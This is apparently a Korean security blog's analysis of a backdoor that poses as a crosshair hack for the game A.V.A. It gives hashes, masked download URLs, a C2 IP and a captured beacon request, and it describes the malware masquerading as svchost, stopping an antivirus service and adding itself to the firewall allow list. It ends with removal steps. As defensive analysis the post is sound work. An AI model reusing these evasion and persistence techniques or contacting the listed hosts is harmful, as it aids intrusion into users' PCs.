피망(PMang) FPS 온라인 게임 아바(A.V.A)에서 사용할 수 있는 크로스헤어 핵으로 위장하여 감염시 원격 제어 등 악의적인 동작이 이루어질 것으로 보이는 백도어(Backdoor) 유포에 대해 살펴보도록 하겠습니다.


해당 유포 방식은 국내 특정 블로그에 첨부 파일 방식으로 이루어지고 있으며, 2011년 7월 중순경에 등록되어 있습니다.

해당 첨부 파일(MD5 : 70b768f541bc8f855efc1e9d4409d980)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Agent.40960.BUK (VirusTotal : 9/39) 진단명으로 진단될 예정입니다.
  • h**p://mom***.dyndns.tv/00aaa.dll
  • h**p://mom***.dyndns.tv/d_shxm37.dll
  • h**p://mom***.dyndns.tv/dia_shxm37.exe
[추가 다운로드 파일 진단 정보]

00aaa.dll
 - MD5 : d48ac1095a6da1a0212ff63cde598cfc
 - nProtect : Trojan/W32.Rootkit.8256.C (VirusTotal : 37/43)

d_shxm37.dll
 - MD5 : 6d8b4e0c65af4b320624a61b79ab0387

dia_shxm37.exe
 - MD5 : 5c85ee61b7331fdc3d4ebc08afa8f2d7
 - AhnLab V3 : Win-Trojan/Agent.1006237.B (VirusTotal : 13/43)

첨부 파일을 실행할 경우 해외 무료 DNS 서비스에 등록된 서버에서 3개의 파일을 다운로드하여 설치가 이루어지도록 구성되어 있습니다.

[생성 파일 및 진단 정보]

C:\WINDOWS\system32\ras\lsass.exe
 - MD5 : d1fd0f0a758a9a577dd6f45bdf919477

C:\WINDOWS\system32\ras\svchost.dll
 - MD5 : b29ab098532a388acfe81834501c3033
 - AhnLab V3 : Backdoor/Win32.WinVNC (VirusTotal : 4/43)

C:\WINDOWS\system32\ras\svchost.exe
 - MD5 : 24a4bc7b3b2157452e5d9efde33dde0e

C:\WINDOWS\system32\ras\svchost.ini


생성된 파일들은 [C:\WINDOWS\system32\ras] 폴더 내부에 생성되며, 마이크로소프트(Microsoft)사에서 제작한 파일로 위장을 하고 있습니다.

실제 생성된 파일의 등록 정보를 살펴보면 그림과 같이 정상적인 시스템 관련 파일로 사용자 눈을 속이고 있습니다.

설치 과정을 세부적으로 살펴보면 사용자가 설치 파일을 실행할 경우 C:\WINDOWS\system32\sc.exe 파일을 실행하여 알약(ALYac) 보안 제품 서비스 중지를 시도하여 진단을 우회하려고 시도합니다.

그 후 특정 서버로부터 위에서 언급한 3개의 파일을 다운로드하여 [C:\Documents and Settings\(사용자 계정)\Templates] 폴더 내부에 ~00aaa.dll, ~d.dll, ~dia.exe 파일을 생성하여 설치가 이루어집니다.

~dia.exe 파일은 최종적으로 [C:\WINDOWS\system32\ras\svchost.exe] 파일 생성 및 서비스 등록을 통해 시스템 시작시 자동 실행되도록 구성합니다.

등록된 서비스 이름은 Svchost Service이며, Provides secure remote desktop sharing 기능을 하는 원격 제어 기능을 포함하고 있습니다.

참고로 해당 svchost.exe 서비스 파일을 Windows 방화벽 허용 목록에 추가하여 차단되지 않도록 레지스트리를 수정합니다.

서비스에 등록된 svchost.exe(C:\WINDOWS\system32\ras\svchost.exe) 프로세스를 확인해보면 Microsoft(microsoft service host)로 표시되어 쉽게 확인하기 어렵습니다.(※ 정상적인 svchost.exe 파일은 C:\WINDOWS\system32\svchost.exe 입니다.)

서비스로 등록된 svchost.exe 프로세스는 메모리에 상주하며 주기적으로 211.181.82.214 국내 IP와 연결을 시도하는 동작을 확인할 수 있습니다.

GET http://north233.dyndns.tv/cs/a1.htm?c=11&a=pb-ftd6-x7_PnydHfwcd3naGJq89PSXFPXUVxSU9BcUVdUctTjYnz48n&b=3 HTTP/1.1
Host: north233.dyndns.tv
Pragma: no-cache


이를 통해 차후 감염된 좀비 PC는 공격자가 원하는 시간에 연결되어 원격 제어를 통한 정보 유출, 시스템 파괴 등 악의적인 동작이 발생할 것으로 추정됩니다.

수동으로 문제 해결을 위해서는 실행 중인 서비스 중지를 위해 실행창에 [sc stop "Svchost Service"] 명령어를 입력한 후 생성된 파일과 레지스트리를 삭제하시기 바랍니다.

[생성 레지스트리 등록 정보]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\
Parameters\
FirewallPolicy\StandardProfile\AuthorizedApplications\List
 - C:\WINDOWS\system32\ras\svchost.exe = C:\WINDOWS\system32\ras\svchost.exe:*:Enabled:svchost
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_AUAUAUCN
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\
LEGACY_SVCHOST_SERVICE

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Svchost Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\auauaucn

위와 같인 온라인 게임을 즐기는 사용자들이 많이 찾는 핵 프로그램으로 위장하여 실제로는 감염을 통해 몰래 상대방 PC를 들여다보는 악성 파일이 있으므로, 단순히 보안 제품에 진단이 되지 않거나 핵 파일은 보안 제품에서 진단된다는 잘못된 인식으로 함부로 실행하는 일이 없도록 주의하시기 바랍니다.

신고
블로그 이미지

벌새

울지않는벌새가 되고 싶은 나..